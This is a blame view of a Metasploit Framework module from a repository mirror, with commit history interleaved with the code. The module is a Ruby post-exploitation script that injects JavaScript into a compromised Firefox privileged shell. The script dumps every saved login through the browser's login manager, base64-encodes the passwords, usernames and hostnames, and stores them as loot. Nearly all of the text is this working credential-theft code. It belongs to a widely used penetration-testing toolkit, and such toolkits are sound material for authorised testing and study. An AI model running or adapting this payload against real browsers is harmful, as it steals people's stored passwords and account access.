infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/post/firefox/gather/passwords.rb

86 lines
2.5 KiB
Ruby
Raw Normal View History

Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
##
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'json'
require 'msf/core'
require 'msf/core/payload/firefox'
class Metasploit3 < Msf::Post
include Msf::Payload::Firefox
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox Gather Passwords from Privileged Javascript Shell',
'Description' => %q{
This module allows collection of passwords from a Firefox Privileged Javascript Shell.
},
'License' => MSF_LICENSE,
'Author' => [ 'joev' ],
Fix wrong DisclosureDate.
2014-04-11 21:17:22 +00:00
'DisclosureDate' => 'Apr 11 2014'
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
))
register_options([
OptInt.new('TIMEOUT', [true, "Maximum time (seconds) to wait for a response", 90])
], self.class)
end
def run
Refactors firefox js usage into a mixin.
2014-04-24 20:07:48 +00:00
results = js_exec(js_payload)
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
if results.present?
begin
passwords = JSON.parse(results)
Add base64 to prevent potential encoding issues.
2014-04-11 22:30:04 +00:00
passwords.each do |entry|
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
end
Make window invisible.
2014-06-06 21:40:55 +00:00
if passwords.length > 0
file = store_loot("firefox.passwords.json", "text/json", rhost, passwords.to_json)
print_good("Saved #{passwords.length} passwords to #{file}")
else
print_warning("No passwords were found in Firefox.")
end
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
rescue JSON::ParserError => e
print_warning(results)
end
end
end
def js_payload
%Q|
(function(send){
try {
var manager = Components
.classes["@mozilla.org/login-manager;1"]
.getService(Components.interfaces.nsILoginManager);
var logins = manager.getAllLogins();
var passwords = [];
Add base64 to prevent potential encoding issues.
2014-04-11 22:30:04 +00:00
var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
var fields = ['password', 'passwordField', 'username', 'usernameField',
'httpRealm', 'formSubmitURL', 'hostname'];
var sanitize = function(passwdObj) {
var sanitized = { };
Add base64 to prevent potential encoding issues.
2014-04-11 22:30:04 +00:00
for (var i in fields) {
sanitized[fields[i]] = b64(passwdObj[fields[i]]);
}
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
return sanitized;
}
Errant whitespace
2014-04-14 18:34:39 +00:00
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
// Find user from returned array of nsILoginInfo objects
for (var i = 0; i < logins.length; i++) {
passwords.push(sanitize(logins[i]));
}
send(JSON.stringify(passwords));
} catch (e) {
send(e);
}
Pass #send in this so jsobfu is not confused.
2014-09-24 20:07:14 +00:00
})(this.send);
Add password colletion post module for Firefox shells.
2014-04-11 21:15:48 +00:00
|.strip
end
end